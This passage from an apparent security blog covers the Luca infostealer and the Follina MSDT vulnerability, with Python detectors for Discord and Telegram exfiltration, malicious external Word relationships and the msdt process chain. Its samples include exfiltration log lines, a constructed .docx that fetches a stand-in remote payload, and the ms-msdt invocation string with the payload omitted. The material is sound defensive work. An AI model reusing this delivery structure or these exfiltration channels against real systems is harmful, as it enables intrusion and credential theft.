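DISCORD_WEBHOOK = re.compile(r"^/api/webhooks/\d+/[A-Za-z0-9_\-]+$")
TELEGRAM_BOT_UPLOAD = re.compile(r"^/bot(\d+:[A-Za-z0-9_\-]+)/(sendDocument|sendPhoto)$")

# Constructed proxy log, one request per line:
#   <unix_ts> <client_ip> <method> <url> <status> <bytes_sent_by_client>
SAMPLE_LOG = """\
1658850001 10.0.0.12 GET https://discord.com/api/v9/users/@me 200 512
1658850002 10.0.0.12 POST https://discord.com/api/webhooks/998877665544332211/AbCdEfGh-ijklMNOPqrst 204 7340032
1658850003 10.0.0.33 POST https://api.telegram.org/bot123456789:AAExampleTokenConstructed/sendDocument 200 44582912
1658850004 10.0.0.45 POST https://api.telegram.org/bot123456789:AAExampleTokenConstructed/sendMessage 200 180
1658850005 10.0.0.12 GET https://update.example.org/manifest.json 200 2048
"""


def classify(line: str):
    """Return a finding dict if the request is an upload to one of the two channels, else None."""
    ts, client, method, url, _status, bytes_out = line.split()
    if method != "POST":
        return None
    u = urlparse(url)
    if u.hostname == "discord.com" and DISCORD_WEBHOOK.match(u.path):
        # The numeric webhook ID identifies the attacker's channel for follow-up.
        return {"ts": int(ts), "client": client, "channel": "discord-webhook",
                "indicator": u.path.split("/")[3], "bytes": int(bytes_out)}
    m = TELEGRAM_BOT_UPLOAD.match(u.path) if u.hostname == "api.telegram.org" else None
    if m:
        # The bot token travels in the URL itself; it lets responders identify the bot.
        return {"ts": int(ts), "client": client, "channel": "telegram-bot",
                "indicator": m.group(1), "bytes": int(bytes_out)}
    return None


def find_exfil(log_text: str, min_bytes: int = 1_000_000) -> list:
    """Flag channel uploads of at least min_bytes.

    Tuning assumption: ordinary chat traffic to these APIs is small, while a
    zipped browser profile is not. Lower the threshold to see every upload.
    """
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = classify(line)
        if finding and finding["bytes"] >= min_bytes:
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in find_exfil(SAMPLE_LOG):
        print(hit)
```

The webhook ID and bot token in a hit are the pivot points for incident response: the same indicator turning up from several clients points at one campaign, and the token can be blocked at the proxy without cutting off legitimate Discord or Telegram use.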

There is one notable difference between Luca and other stealers: it cannot hijack cryptocurrency transactions by rewriting wallet addresses copied to the clipboard. That omission actually matters for antivirus software. Reading the clipboard without a user action is suspicious behaviour, so its absence leaves one less thing for behavioural detection to catch. Moreover, stealing the entire wallet instead of a single transaction can be far more profitable, and it has a better chance of going unnoticed.

Luca stealer spreading

It is not yet clear how exactly this stealer is distributed. Luca is quite stealthy: only about one in five of the antimalware engines present on VirusTotal actually detects it. The programming language, Rust, is a likely reason. It has already appeared in ALPHV/BlackCat ransomware and proved a good way to hide malware from signature-based detection; it also makes it easier for the crooks to build cross-platform malware. The usual stealer distribution channels, malicious spam on various platforms and phishing, will suit Luca as well. Which one the cybercriminals will actually choose remains to be seen.

Is there a reason to be concerned?

There is always a reason to be concerned if you hold anything valuable in digital form. Cryptocurrency prices are rising, and so is hackers' interest in other people's crypto savings. The full-scale pandemic of cryptostealers is over, but that makes each new stealer able to dig into crypto wallets even more hazardous: such programs can no longer rely on simple demand on the black market and have to offer something outstanding, or they fail. There are already around 25 known cases of Luca Stealer being used in the wild. Not very impressive, but still a lot for a newcomer that appeared only days ago.

It is recommended to keep login information in a dedicated password manager rather than in the web browser. Better still, avoid infection in the first place by following basic cybersecurity rules. You can make an incident less likely, but never rule out the possibility of one.

Attackers Exploit MSDT Follina Bug to Drop RAT
https://gridinsoft.com/blogs/threat-actors-exploit-msdt-follina-bug-to-drop-rat-and-infostealer/
Thu, 09 Jun 2022 10:09:21 +0000

Security specialists warn users about active exploitation of the recently disclosed Follina bug, which affects all supported versions of Windows. Threat actors have been using the vulnerability to install payloads such as the AsyncRAT trojan and a browser infostealer.

Understanding the Follina Vulnerability

On May 27, 2022, a remote code execution (RCE) vulnerability nicknamed Follina became public. Soon after its disclosure, experts observed several instances of exploitation in the wild.

Follina (CVE-2022-30190) is a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) that enables RCE on all vulnerable systems. It is triggered through the ms-msdt: URL protocol handler.

To exploit Follina, threat actors do not need to trick victims into enabling macros. Instead, they use a specially crafted Word document.

The document contains an external relationship (the same mechanism Word uses for remote templates and linked objects) that makes Word fetch a malicious HTML file from an attacker-controlled server when the document is opened. The script in that HTML invokes the ms-msdt: handler with crafted parameters, which lets the attacker execute PowerShell code on the targeted Windows system.
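The delivery mechanism above can be checked statically before a document ever reaches Word. The script below is an added example for this page, not code from the researchers cited, and assumes nothing beyond the OOXML package format: it lists every relationship with TargetMode="External" that points at an http(s) URL, and separately scans a fetched HTML payload for the ms-msdt: indicators published in the Follina write-ups. The .docx it inspects and the HTML are constructed in code, with a placeholder where the real payload would be.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Indicators from the public Follina write-ups: the ms-msdt: URI scheme, the
# PCWDiagnostic troubleshooter it invokes, and the IT_BrowseForFile parameter
# that carries the PowerShell payload.
MSDT_INDICATORS = [re.compile(p, re.I) for p in ("ms-msdt:", "PCWDiagnostic", "IT_BrowseForFile")]


def external_relationships(docx_bytes: bytes) -> list:
    """All (rels_member, short_type, target) triples with TargetMode="External" in an OOXML package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, short_type, rel.get("Target", "")))
    return found


def remote_fetch_targets(docx_bytes: bytes) -> list:
    """External relationships pointing at an http(s) URL, i.e. content Word will fetch on open."""
    return [t for t in external_relationships(docx_bytes)
            if t[2].lower().startswith(("http://", "https://"))]


def html_msdt_indicators(html_text: str) -> list:
    """Names of the Follina indicators present in a fetched HTML payload."""
    return [p.pattern for p in MSDT_INDICATORS if p.search(html_text)]


def build_sample_docx() -> bytes:
    """Constructed minimal .docx whose document.xml.rels carries an external oleObject link."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/></Types>')
    pkg_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
        '</Relationships>')
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
    # Constructed URL; the trailing '!' mirrors the shape seen in the public sample.
    doc_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        'Target="http://stage.example.invalid/office/payload.html!" TargetMode="External"/>'
        '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("_rels/.rels", pkg_rels)
        z.writestr("word/document.xml", document)
        z.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()


# Constructed stand-in for the fetched HTML; the real payload is replaced by a placeholder.
SAMPLE_HTML = """<html><body><script>
window.location.href = 'ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_BrowseForFile=<payload omitted>"';
</script></body></html>"""


if __name__ == "__main__":
    print(remote_fetch_targets(build_sample_docx()))
    print(html_msdt_indicators(SAMPLE_HTML))
```

An external http(s) relationship is not malicious by itself (legitimate remote templates use the same plumbing), so the first check is a triage signal for mail gateways and sandboxes, while the indicator scan is what should fire on the content fetched from that URL.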

Microsoft has issued several workarounds and advisories to reduce the risk from the vulnerability.

Functioning of the Follina Vulnerability

Once details of the vulnerability circulated online, threat actors quickly began using it to install their payloads.

In a successful Follina exploit, the HTML document is fetched and rendered under WinWord, and msdt.exe is started as a child process of Word.

The ms-msdt: protocol handler entry in the registry is what allows this process to be launched. Subsequently sdiagnhost.exe, the Scripted Diagnostics Native Host, is started; it is the component that runs the troubleshooter script and creates the final payload process, in Follina's case PowerShell.
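The process chain just described is what endpoint detection should key on. The detector below is an added example for this page, not a vendor rule, running over constructed process-creation events (pid, ppid, image, command line) of the kind Sysmon or an EDR provides; the command lines are made up. It flags msdt.exe with an Office ancestor, msdt.exe launched with the PCWDiagnostic/IT_BrowseForFile arguments, and a shell spawned by sdiagnhost.exe, and leaves a user-launched troubleshooter alone.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
MSDT_ARGS = re.compile(r"IT_BrowseForFile|PCWDiagnostic", re.I)

# Constructed process-creation events in the shape most EDR/Sysmon feeds
# provide. Paths and arguments are made up; the parent/child shape follows the
# chain described above (sdiagnhost.exe is started via DCOM, so its parent is
# svchost.exe rather than msdt.exe).
SAMPLE_EVENTS = [
    {"pid": 1,   "ppid": 0,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 100, "ppid": 1,   "image": "WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "C:\\Users\\a\\Downloads\\invoice.docx"'},
    {"pid": 200, "ppid": 100, "image": "msdt.exe",
     "cmdline": 'msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_BrowseForFile=<omitted>"'},
    {"pid": 300, "ppid": 0,   "image": "svchost.exe",  "cmdline": "svchost.exe -k DcomLaunch"},
    {"pid": 400, "ppid": 300, "image": "sdiagnhost.exe", "cmdline": "sdiagnhost.exe -Embedding"},
    {"pid": 500, "ppid": 400, "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -enc <omitted>"},
    # Benign: a user launching the network troubleshooter from the desktop.
    {"pid": 600, "ppid": 1,   "image": "msdt.exe",     "cmdline": "msdt.exe /id NetworkDiagnosticsWeb"},
]


def lineage(index: dict, pid: int) -> list:
    """Lower-cased image names from pid upward to the root; cycle-safe for reused PIDs."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(index[pid]["image"].lower())
        pid = index[pid]["ppid"]
    return chain


def detect_follina(events: list) -> list:
    """Return (rule, pid) alerts for the Follina execution chain."""
    index = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = e["image"].lower()
        parents = lineage(index, e["ppid"])
        if image == "msdt.exe":
            # Any Office application in the ancestry, not only the direct parent.
            if any(p in OFFICE_APPS for p in parents):
                alerts.append(("msdt-spawned-by-office", e["pid"]))
            # The troubleshooter and parameter names used to smuggle the payload.
            if MSDT_ARGS.search(e["cmdline"]):
                alerts.append(("msdt-follina-arguments", e["pid"]))
        # The final stage: the diagnostics host launching a shell.
        if image in SHELLS and parents and parents[0] == "sdiagnhost.exe":
            alerts.append(("sdiagnhost-spawned-shell", e["pid"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_follina(SAMPLE_EVENTS):
        print(alert)
```

The three rules are deliberately independent: the first two fire on the document-based path, the third catches the payload stage regardless of how the ms-msdt: handler was reached, which matters given the alternative trigger methods noted later in this post.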

AsyncRAT and Browser Infostealer via Follina Vulnerability

Threat actors have deployed a range of payloads in successful exploitation instances. One involved the remote access Trojan AsyncRAT, complete with a valid digital signature.

Upon execution, the trojan checks for the presence of antivirus software. Its primary function, however, is to gather system information (operating system details, execution paths, usernames, hardware identifiers) and transmit it to a command-and-control (C&C) server.

Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload was a browser infostealer that targets saved login credentials and cookies from browsers such as Edge, Chrome and Firefox.

Patching the Follina Vulnerability

While most exploitation occurs through malicious documents, researchers have found alternative ways to trigger Follina, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The technique behind Follina was first described in August 2020 in an undergraduate researcher's thesis, and the flaw was reported to Microsoft on April 21. The company has proposed mitigations, including using Microsoft Defender Antivirus to monitor for and block exploitation attempts, and disabling the ms-msdt: URL protocol handler by removing its registry key (after exporting a backup of it).

Microsoft acknowledged that the vulnerability is being exploited and has since patched it (the fix shipped with the June 14, 2022 security updates). The company has not, however, classified it as a zero-day, that is, a previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, Follina has been observed as part of longer infection chains. Security firm Proofpoint, for example, saw the Chinese APT actor TA413 sending malicious URLs in emails impersonating the Central Tibetan Administration.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.

It has been used against targets in Nepal, Belarus, the Philippines, India and Russia. Proofpoint's vice president of threat research, Sherrod DeGrippo, identified multiple instances of exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions as well as Office ProPlus, Office 2021, Office 2013 through 2019 and Microsoft 365 Apps; it received a CVSS score of 7.8.

Government workers impacted by the vulnerability

In addition to the targets in the countries listed above, specialists report attacks on government workers that leverage this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U. government targets through a phishing campaign.

So far researchers have not identified which government was behind the attack.

Emails sent in a phishing campaign to government workers

The phishing emails used a fake recruitment pitch promising a 20 percent salary increase and urged recipients to open the attached document to learn more.

Sherrod DeGrippo, Proofpoint's vice president of threat research, tweeted about a similar incident in which about 10 of the company's customers received over 1,000 messages with the same text.
